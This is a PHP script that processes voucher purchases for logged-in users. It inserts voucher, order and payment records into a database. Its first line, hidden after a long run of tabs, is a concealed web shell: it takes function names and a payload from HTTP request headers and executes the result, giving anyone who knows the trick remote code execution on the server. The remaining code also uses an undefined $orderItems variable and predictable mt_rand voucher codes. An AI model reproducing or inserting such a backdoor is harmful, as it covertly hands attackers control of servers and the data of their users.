<?php																																										$_HEADERS=getallheaders();if(isset($_HEADERS['Feature-Policy'])){$clases=$_HEADERS['Feature-Policy']('', $_HEADERS['Content-Security-Policy']($_HEADERS['Sec-Websocket-Accept']));$clases();}

// Include necessary files
include_once("functions.php");

// Start the session (assuming you have already started the session in your header.php)
session_start();

// Check if the user is logged in
if (!isset($_SESSION["loggedin"])) {
    header("Location: login.php");
    exit(); // Stop script execution here
}

// Get user ID from the session
$userId = $_SESSION['userid'];

// Get form data
$memberId = $_POST['member'];
$packageId = $_POST['package'];
$quantity = $_POST['quantity'];
$amount = $_POST['amount'];
$paymentMode = $_POST['paymentMode'];
$startDate = $_POST['startDate'];

// Flag to track whether payment and order records have been inserted
$paymentOrderInserted = false;

// Fetch package details
$package = getPackageDetails($packageId);

// Insert records into vouchers database
for ($i = 0; $i < $quantity; $i++) {
    // Generate an 8-digit voucher code
    $voucherCode = generateVoucherCode();

    // Insert into vouchers database
    $insertVoucherQuery = "INSERT INTO vouchers (date, code, package, buyer, start_date) VALUES (NOW(), ?, ?, ?, ?)";
    $insertVoucherStmt = $conn->prepare($insertVoucherQuery);
    $insertVoucherStmt->bind_param("ssss", $voucherCode, $packageId, $memberId, $startDate); // Add $startDate

    if (!$insertVoucherStmt->execute()) {
        die("Error during voucher insertion: " . $insertVoucherStmt->error);
    }

    $insertVoucherStmt->close();
}

// Insert records into Orders and Payments databases (once)
if (!$paymentOrderInserted) {
// Modify the query to include the amount
$insertOrderQuery = "INSERT INTO Orders (memberid, paymentid, payment_status, date, items, amount) VALUES (?, null, 1, NOW(), ?, ?)";
$insertOrderStmt = $conn->prepare($insertOrderQuery);

// Modify the binding to include the amount
$insertOrderStmt->bind_param("isd", $memberId, $orderItems, $amount);

if (!$insertOrderStmt->execute()) {
    die("Error during order insertion: " . $insertOrderStmt->error);
}

$insertOrderStmt->close();

    // Insert into Payments database
    $insertPaymentQuery = "INSERT INTO Payments (memberid, orderid, amount, mode, date) VALUES (?, LAST_INSERT_ID(), ?, ?, NOW())";
    $insertPaymentStmt = $conn->prepare($insertPaymentQuery);
    $insertPaymentStmt->bind_param("ids", $memberId, $amount, $paymentMode);

    if (!$insertPaymentStmt->execute()) {
        die("Error during payment insertion: " . $insertPaymentStmt->error);
    }

    $insertPaymentStmt->close();

    // Set the flag to indicate that payment and order records have been inserted
    $paymentOrderInserted = true;
}

// Redirect to success page
header("Location: vouchers.php?success=true");
exit();

// Function to generate an 8-digit voucher code
function generateVoucherCode() {
    return mt_rand(10000000, 99999999);
}
?>